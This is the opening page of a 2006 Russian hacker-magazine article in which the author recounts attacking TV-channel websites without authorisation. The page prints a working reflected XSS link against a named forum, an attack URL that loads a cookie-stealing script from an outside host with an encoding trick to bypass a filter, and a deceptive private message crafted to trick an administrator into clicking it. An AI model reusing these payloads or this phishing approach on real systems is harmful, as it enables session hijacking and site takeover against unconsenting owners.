Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #94, ОКТЯБРЬ 2006 г.

Тотальный дестрой TV

Longer

Хакер, номер #094, стр. 094-078-1

Хардкорный взлом популярных телекомпаний

Ты никогда не мечтал захватить сайты TV и писать свои новости или изменять их по своему усмотрению? Ни для кого не секрет, что нет идеально защищенных систем. Чтобы убедить в этом остальных, я стал тестировать сайты TV одного крупного города. Что показал мой неофициальный аудит, ты сейчас узнаешь...

Для начала я расскажу, как мне пришла в голову мысль проверить на прочность официальные сайты TV отдельно взятого города-миллионника. Во время ужина я врубил телик и клацал по каналам. На одном из них шел анонс утренней передачи. В ней говорилось про электронные деньги примерно следующее: «Мы расскажем вам про деньги, которые нельзя порвать, вы их не потеряете, и у вас их НЕ УКРАДУТ...» Последнее слово меня удивило и возмутило :). Я написал на форуме примерно такой пост: «Кто вам сказал, что нельзя украсть электронные деньги?». Ответом был следующий отмаз: «Имелось в виду путем залезания в карман». Через пару дней за завтраком на том же канале меня насмешили еще раз, опять при анонсе. В этот раз в передаче для геймеров прозвучала фраза: «Игра – это занимательный софт для юных компьютерных талантов (или гениев)». Писать журналюгам на форум я не стал, а просто решил проверить их сайт на прочность. А заодно и ресурсы остальных телеканалов.

4-й канал

После завтрака я приступил к изучению первого сайта: www.channel4.ru. Движок сайта был полностью написан на перле. Внешне портал был оформлен в синих тонах, на главной странице красовались новости, опросы, погода и т.д. Немного побродив по ресурсу и не найдя дырок, я приступил к изучению форума www.channel4.ru/cgi/4room/. Это был движок, написанный также на перле, с полностью убранными копирайтами. Проверяя каждую ссылку, содержащую параметры, я нашел XSS: http://www.channel4.ru/cgi/4room/4room.pl?board=express;action=display;num=<script>alert()</script>. Далее я залил на удаленный хост снифер, состоящий из 2-х файлов: shif.js и snif.php (их исходники смотри на DVD). После чего составил линк для атаки: http://www.channel4.ru/cgi/4room/4room.pl?board=express;action=display;num=<script src=http://xsite.ru/shif.js></script>. Решив протестить хакерскую систему, я обломался: видимо, что-то где-то фильтровалось. Заглянув в исходник HTML-страницы, я увидел, что фильтруется знак равенства. Немного подумав, я заменил = на %3D (код «=»). Проверив ссылку повторно, я получил свои куки на мыло. Теперь осталось отправить письмо одному из админов. В одном из тредов на форуме (именно туда я запостил фразу, касаемую электронных денег) написал админу PM следующего содержания:

Может, вы еще про поисковики репортаж сделаете: [URL=http://www.channel4.ru/cgi/4room/4room.pl?board=express;action=display;num=<script%20src%3Dhttp://xsite.ru/shif.js></script>]http://punto.ru[/URL] ?

Здесь я указал на реальную тему, в которой писал админ, для того чтобы он не заподозрил неладное. Также я специально выбрал поисковик, который не так известен, как, например, Яндекс. Если ты изучил исходник снифера, то ты наверняка заметил переадресацию в первой строчке на сайт поисковика. Это я задумал, чтобы также не вызывать никаких подозрений у админа.

Содержание  Вперед на стр. 094-078-2
ttfb: 2.9709339141846 ms